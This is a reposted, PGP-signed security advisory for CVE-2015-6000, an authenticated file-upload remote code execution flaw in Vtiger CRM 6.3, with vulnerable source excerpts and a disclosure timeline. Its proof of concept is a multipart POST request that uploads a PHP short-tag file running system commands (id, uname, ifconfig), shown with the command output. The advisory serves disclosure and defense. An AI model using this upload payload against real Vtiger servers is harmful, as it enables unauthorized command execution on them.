Vtiger CRM 6.3 Remote Code Execution

2015.09.29
Risk: High
Local: No
Remote: Yes
CWE: CWE-434


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Vtiger CRM Authenticated Remote Code Execution (CVE-2015-6000) <http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html> 1. Summary 2. Vulnerability Details 3. Exploitation / Proof of Concept 4. Timeline 5. See Also ########## 1. Summary ########## Vtiger CRM <https://www.vtiger.com/open-source/> is a CRM application. Vtiger CRM version 6.3 (?Open Source? branch; released on 2015-06-04) and lower are vulnerable to Authenticated Remote Code Execution. ########## 2. Vulnerability Details ########## Vtiger CRM allows for the upload of a "company logo" from within the administrative interface. The corresponding functionality can be accessed on the "CRM Settings" page (Settings -> CRM Settings -> Templates -> Company Details -> "Edit" button; (<.../index.php?parent=Settings&module=Vtiger&view=CompanyDetails&block=4&fieldid=15>). Multiple flaws in the Settings_Vtiger_CompanyDetailsSave_Action class allow attackers to upload files with arbitrary file names and (almost) arbitrary contents, including, but not limited to, PHP code passing commands to the underlying operating system. First, the file type check is based solely on the MIME type ("Content-Type") sent by the client: (Source file: vtigercrm/modules/Settings/Vtiger/actions/CompanyDetailsSave.php) class Settings_Vtiger_CompanyDetailsSave_Action extends Settings_Vtiger_Basic_Action { [...] $logoDetails = $_FILES['logo']; $fileType = explode('/', $logoDetails['type']); $fileType = $fileType[1]; if (!$logoDetails['size'] || !in_array($fileType, Settings_Vtiger_CompanyDetails_Model::$logoSupportedFormats)) { $saveLogo = false; } This is followed by an insufficient check for PHP code inside the uploaded file: (Source file: vtigercrm/modules/Settings/Vtiger/actions/CompanyDetailsSave.php) // Check for php code injection $imageContents = file_get_contents($_FILES["logo"]["tmp_name"]); if (preg_match('/(<\?php?(.*?))/i', $imageContents) == 1) { $saveLogo = false; } Not only can this check be circumvented by using PHP short tags instead of ?<?php ?. It also provides no protection whatsoever against uploads of code written in scripting languages other than PHP, which, depending on the system configuration, may or may not be executable. Vtiger CRM then saves the uploaded file's contents with the client-specified file name in the publicly accessible "test/logo/" directory: (Source file: modules/Settings/Vtiger/models/CompanyDetails.php) class Settings_Vtiger_CompanyDetails_Model extends Settings_Vtiger_Module_Model { [...] var $logoPath = 'test/logo/'; [...] public function saveLogo() { $uploadDir = vglobal('root_directory'). '/' .$this->logoPath; $logoName = $uploadDir.$_FILES["logo"]["name"]; move_uploaded_file($_FILES["logo"]["tmp_name"], $logoName); copy($logoName, $uploadDir.'application.ico'); } Combining these flaws, an attacker can transfer arbitrary code to the web server, as long as s/he provides a permitted MIME type (e.g. "Content-Type: image/jpeg") and avoids the string ?<?ph? within the code. The code can then be run by accessing the location of the uploaded file (?<Vtiger URL>/test/logo/<attacker-specified file name>?). ########## 3. Exploitation / Proof of Concept ########## Through a specially crafted HTTP-POST request, a PHP file is stored on the server hosting the Vtiger CRM software: POST /index.php HTTP/1.1 Host: [...] Cookie: [...] Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------51732462825208 Content-Length: 2040 -----------------------------51732462825208 Content-Disposition: form-data; name="__vtrftk" [...] -----------------------------51732462825208 Content-Disposition: form-data; name="logo"; filename="2.php" Content-Type: image/jpeg <? system('id; uname -a; /sbin/ifconfig -a'); system('cat ../../vtigerversion.php'); ?> -----------------------------51732462825208 Content-Disposition: form-data; name="address" [...] The resulting PHP file can then be accessed at <Vtiger URL>/test/logo/2.php , which will execute the given commands and display their output: uid=3491(mussKV4JcX9c) gid=3491(mussKV4JcX9c) groups=3491(mussKV4JcX9c) Linux [...] 3.2.0-77-virtual #114-Ubuntu SMP Tue Mar 10 17:38:02 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux eth0 Link encap:Ethernet HWaddr [...] inet addr: [...] ########## 4. Timeline ########## 2015-08-28 Vulnerability reported to Vtiger. 2015-09-01 Vtiger acknowledges vulnerability. 2015-09-03 CVE-2015-6000 assigned by CERT/CC. 2015-09-28 Public disclosure. ########## 5. See Also ########## CVE-2015-6000 at cve.mitre.org: <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6000> CVE-2015-6000 at NVD: <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6000> Source: <http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html> -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.21 iQIcBAEBAgAGBQJWCVMJAAoJEAg0a3ng3v4fyPQQAIQnPDewMWRG8SDvcbyRINPv VSYigmW2toTjNYv6/I5a+34fz9D3S1z425+4dXeuZQyT7LDvKsgZhtzOJE9HKXW4 MfEfCfUE6iWg+GOcrBztoF09tOuTNd+06l+BGIb7a7xQO+656XA+jQ6AULE9nPtC iaw4X3ArhA/nh1B3G5Bawz8AJxwC+bEjVG2sGeXaxbhLwiEtWD9Mfi+fZlMimr3k kmn5tQ21PevU5dKS7i2Cl6ykwcV1hrR5E2vyxYzpjy25242qMdcNyvZnvs28zpKa KV8CegrIo6N+sRyqBCd7aZfuZbDzkBaITq6C5Ae5VO5fnOHAfDM8gJG+SqH1enqM c0oqWtQ6m3Fqyp9Mu012Qi3cu7ONAYRd9ehBBnj59TLNAZYNf2n1pHMAxK6d7Skt 9v7+hPff1MpZqjcV7L/RJryREznG1gIQltlrd6fjMdazs6BIETfWDr/jBK33lAUX +rrWUX8H4JgFrlqXDpy0jTmom8mgNtb9qncQDxd5kpodSWE0SjTI8/zwm19qVX1G mIDRLXWBHqN41mA2KC/ac9Ep3Yj5AQrFQ3jXVq4VmdCMB50LeSXn1HyWzc6dmqmt +5Cct/NxIfXYXvcYAG+UkfOyxRDRZhhfw7PbUrI2fMx+vjoEuMDPDOcwmH/JSnU5 QufrotYWhaf1IkT21ZLr =pq0q -----END PGP SIGNATURE-----

References:

http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top